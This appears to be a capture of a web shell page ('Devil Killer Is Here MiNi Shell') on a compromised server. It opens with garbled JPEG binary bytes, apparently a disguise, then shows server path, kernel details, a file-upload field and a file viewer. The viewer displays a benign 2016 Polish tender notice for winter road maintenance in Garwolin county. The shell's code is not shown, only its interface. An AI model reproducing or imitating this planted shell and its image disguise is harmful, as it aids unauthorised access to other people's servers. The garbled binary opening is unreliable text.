JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160921/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160921/311403-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 311403 - 2016
              z dnia 2016-09-21 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wola Rębkowska: Świadczenie usług w zakresie zimowego utrzymania dróg na terenie administrowanym przez Powiatowy Zarząd Dróg w Garwolinie  Służba Drogowo-Mostowa w Garwolinie, Służba Drogowa 
w Trojanowie i Służba Drogowa w Maciejowicach o łącznej długości  528,252 km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018 z podziałem na zadania: Ilość zadań;  XV
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Usługi
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Powiatowy Zarząd Dróg w Garwolinie, krajowy numer identyfikacyjny
              1482375900000, ul.
              ul. Przemysłowa 
              45,
              08410  
              Wola Rębkowska, woj.
              mazowieckie, państwo
              , tel.
              256 822 215, e-mail
              pzd@poczta.fm, faks
              .
              <br />
              Adres strony internetowej (URL): www.pzdgarwolin.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.pzdgarwolin.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Zgodnie z art. 10 c ust. 2 ustawy Prawo Zamówień Publicznych składanie oferty odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r.  Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście lub za pośrednictwem posłańca. <br />
                Adres:
                <br />08-410 Wola Rębkowska, ul. Przemysłowa 45</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Świadczenie usług w zakresie zimowego utrzymania dróg na terenie administrowanym przez Powiatowy Zarząd Dróg w Garwolinie  Służba Drogowo-Mostowa w Garwolinie, Służba Drogowa 
w Trojanowie i Służba Drogowa w Maciejowicach o łącznej długości  528,252 km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018 z podziałem na zadania: Ilość zadań;  XV
<br /><b>Numer referencyjny: </b><br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                usługi
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiot zamówienia obejmuje świadczenie usług w zakresie zimowego utrzymania dróg na terenie administrowanym przez Powiatowy Zarząd Dróg w Garwolinie  Służba Drogowo-Mostowa w Garwolinie, Służba Drogowa w Trojanowie i Służba Drogowa w Maciejowicach 
o łącznej długości  528,252 km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018 z podziałem na zadania: Ilość zadań;  XV
ZADANIE    I 
Zwalczanie śliskości zimowej na drogach  teren działalności Służby Drogowo  Mostowej w Garwolinie, Służby Drogowej w Trojanowie, Służby Drogowej w Maciejowicach przy użyciu; Samochodów ciężarowych z pługami do odśnieżania (Wykonawcy) w ilości 6 szt. + ładowarki do załadunku materiałów uszorstniających na; piaskarki ECOS 40-36 DAT - 3 szt., Krokus model Solka - 1 szt., Schmidt NIDO 90  1szt., i Dandrob P  1 3D  1 szt, (Zamawiającego) wraz z załadunkiem mieszanki piaskowo-solnej na piaskarkę przez Wykonawcę 
Długość dróg do zwalczania śliskości zimowej km  117,822
Mieszankę piaskowo-solną zabezpiecza Zamawiający.
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018   2 800 godz. 
Uwaga!
Pojazdy wykonawcy powinny być wyposażone w system lokalizacji pojazdu.
  Wykonawca w okresie obowiązywania umowy zapewni Zamawiającemu całodobowy dostęp do aplikacji, umożliwiającej podgląd aktualnej pozycji na mapie wszystkich pojazdów, przeznaczonych do zwalczania śliskości zimowej na drogach w ramach przedmiotowego postepowania o udzielenie zamówienia. 
 Zamawiający korzystał będzie z systemu pomocniczo do kontroli pracy wykonywanej przez wykonawcę.	
ZADANIE   II. 
Odśnieżanie dróg samochodami ciężarowym o ładowności od 7 ton Wykonawcy z pługiem odśnieżnym Zamawiającego OZ-W32 szt. 1 i OZ-BR 32  szt. 1 na terenie działalności Służby Drogowo  Mostowej w Garwolinie w ilości szt. 2
Długość dróg przewidzianych do odśnieżania km  190,726 km                               
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  1 700 km
ZADANIE   III. 
Odśnieżanie dróg samochodem ciężarowym o ładowności od 7 ton Wykonawcy z pługiem odśnieżnym Zamawiającego OZ-W32 szt. 1 na terenie działalności Służby Drogowej 
w Trojanowie.
Długość dróg przewidzianych do odśnieżania km  164,186 km          
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  1 000 km
ZADANIE   IV. 
Odśnieżanie dróg samochodem ciężarowym o ładowności od 7 ton Wykonawcy z pługiem odśnieżnym Zamawiającego AC-W32 szt. 1 na terenie działalności Służby Drogowej 
w Maciejowicach 
Długość dróg przewidzianych do odśnieżania km  173,340 km    
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  1 000 km
ZADANIE   V.   
Odśnieżanie dróg ciągnikami rolniczymi lub inną maszyną  na przykład budowlaną z napędem na jedną lub więcej osi o mocy od 80KM do 100KM oraz pługiem do odśnieżania   teren działalności Służby Drogowo  Mostowej w Garwolinie w ilości szt. 2
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  1350 km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz.                
ZADANIE   VI.   
Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 100KM do 150KM, z napędem 4x4, będącego własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie w ilości szt. 1 
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  950km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz.                
ZADANIE   VII.   
Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 150KM, z napędem 4x4, o masie minimum 7 ton będącego własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie w ilości szt. 1
Ilość km w sezonie zimowym 2016/2017 w sezonie zimowym 2017/2018 850 km,
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz.                
ZADANIE   VIII.   
Odśnieżanie dróg ciągnikami rolniczymi lub inną maszyną  na przykład budowlaną z napędem na jedną lub więcej osi o mocy od 80KM do 100KM oraz pługiem do odśnieżania   teren działalności Służby Drogowej w Trojanowie w ilości szt. 2
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  1 600 km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz.                
ZADANIE   IX.   
Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 100KM do 150KM, z napędem 4x4, będącego własnością Wykonawcy teren działalności Służby Drogowej w Trojanowie w ilości szt. 1
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  850 km, 
Ilość godzin w sezonie zimowym 2016/2017 i sezonie zimowym 2017/2018  70 godz.                
ZADANIE   X.   
Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 150KM, z napędem 4x4, o masie minimum 7 ton będącego własnością Wykonawcy teren działalności Służby Drogowej w Trojanowie w ilości szt. 1
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  700 km,
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz.                
ZADANIE   XI.   
Odśnieżanie dróg ciągnikami rolniczymi lub inną maszyną  na przykład budowlaną z napędem na jedną lub więcej osi o mocy od 80KM do 100KM oraz pługiem do
odśnieżania   teren działalności Służby Drogowej w Maciejowicach w ilości szt. 2
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  950 km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz.    
ZADANIE   XII.   
Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 100KM do 150KM, z napędem 4x4, będącego własnością Wykonawcy teren działalności Służby Drogowej w Maciejowicach w ilości szt. 1. 
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  650 km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018 70 godz.       
ZADANIE   XIII.   
Odśnieżanie i zwalczanie naboju lodowego przy użyciu ciągnika rolniczego lub inną maszyną  na przykład budowlaną z pługiem do odśnieżania o mocy powyżej 150KM, z napędem 4x4, o masie minimum 7 ton będącego własnością Wykonawcy teren działalności Służby Drogowej 
w Maciejowicach w ilości szt. 1
Ilość km w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  250 km, 
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018  70 godz.                
ZADANIE   XIV.   
Odśnieżanie i zwalczanie naboju lodowego przy użyciu spycharki będącej własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie, Służby Drogowej w Trojanowie, Służby Drogowej w Maciejowicach w ilości szt. 2.
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018   360 godz.           
ZADANIE   XV.   
Odśnieżanie i zwalczanie naboju lodowego przy użyciu równiarki będącej własnością Wykonawcy teren działalności Służby Drogowo  Mostowej w Garwolinie, Służby Drogowej w Trojanowie, Służby Drogowej w Maciejowicach w ilości szt. 1.
Ilość godzin w sezonie zimowym 2016/2017 i w sezonie zimowym 2017/2018   105 godz. 
Uwaga; 
1) Za czas pracy sprzętu (samochód z pługiem i piaskarką) uważa się czas od momentu rozpoczęcia załadunku piaskarki do momentu zakończenia posypywania. 
2) Wykonawca zapewni obecność operatorów ładowarek na składowisku materiałów w trakcie trwania całego procesu sypania.
3) Wykonawca na każde wezwanie Zamawiającego zobowiązany jest do stawienia się w siedzibie Zamawiającego i złożenia pisemnych wyjaśnień w sprawie skarg użytkowników dotyczących wykonywanej przez siebie usługi.
<br /><br /><b>II.5) Główny kod CPV: </b>90620000-9<br /><b> Dodatkowe kody CPV:</b>90630000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 30/05/2018<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie załączonego do oferty oświadczenia<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                1. W przetargu mogą wziąć udział Wykonawcy, którzy spełniają warunki dotyczące:
1) Zdolności technicznej lub zawodowej;
2. Minimalne warunki dotyczące:
1) Doświadczenia wykonawcy:
 a) Wykonanie w okresie ostatnich 3 lat tj./2013/2014/2015r przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  co najmniej dwóch usług (zimowe odśnieżanie dróg), z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie - załącznik Nr 2, 
Dowodami o których mowa w/w punkcie są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze  Wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert. 
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie wykazu usług i dowodów.
b)Wykonawca oświadcza, że posiada lub będzie dysponował (przez dzierżawę, wynajem, umowę kupna lub w inny sposób), do w pełni sprawnych jednostek transportu, sprzętu przeznaczonych do wykonywania usług w  zakresie zimowego utrzymania dróg w ilości wyszczególnionej w danym zadaniu.
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie wykazu narzędzi, urządzeń technicznych dostępnych wykonawcy (załącznik nr 4).
c)Wykonawca przedstawi wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego (na okres trwania umowy), wraz z imionami i nazwiskami tych osób oraz informacjami na temat ich kwalifikacji zawodowych, uprawnień niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.
Ocenę spełniania warunku udziału w postępowaniu zamawiający przeprowadzi na podstawie wykazu osób, skierowanych przez wykonawcę do realizacji zamówienia  (załącznik nr 3).

3. W przypadku, gdy Wykonawca polega na zdolnościach innych podmiotów, Wykonawca musi udowodnić zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia.

UWAGA!
Zobowiązanie podmiotu trzeciego do oddania Wykonawcy do dyspozycji niezbędnych zasobów winno posiadać, stosowną treść, z której będzie wynikało, że podmiot ten zobowiązał się do udostępnienia określonych zasobów na okres korzystania z nich przy wykonaniu zamówienia oraz dla swej skuteczności musi zostać złożone przez osobę/osoby uprawnione do reprezentowania podmiotu trzeciego w powyższym zakresie. Zobowiązanie złożone przez osobę nieuprawnioną nie dowodzi udostępnienia zasobu przez podmiot trzeci (Zgodnie z wyrokiem KIO2213/11).

5. Zamawiający ocenia, czy udostępniane wykonawcy przez inne podmioty zdolności techniczne lub zawodowe, pozwalają na wykazanie przez wykonawcę spełniania warunków udziału w postępowaniu oraz bada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia, o których mowa w art. 24 ust. 1 pkt 13)-22) ustawy Pzp i w pkt VI.1.1)-3) SIWZ.

6. W odniesieniu do warunku dotyczącego doświadczenia, wykonawcy mogą polegać na zdolnościach innych podmiotów, jeśli podmioty te zrealizują usługi, do realizacji których te zdolności są wymagane.

7. Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.

8. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia w/w warunki udziału mogą być spełnione łącznie.
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu zamawiający będzie żądał następujących dokumentów:
a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy pzp;
b) oświadczenia wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej, przekazane zamawiającemu, w terminie 3 dni od dnia zamieszczenia przez zamawiającego na stronie internetowej informacji, dotyczących:
1) kwoty, jaką zamierza przeznaczyć na sfinansowanie zamówienia;
2) firm oraz adresów wykonawców, którzy złożyli oferty w terminie;
3) ceny, terminu wykonania zamówienia, okresu gwarancji i warunków płatności zawartych w ofertach,
W przypadku przynależności do tej samej grupy kapitałowej wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu.
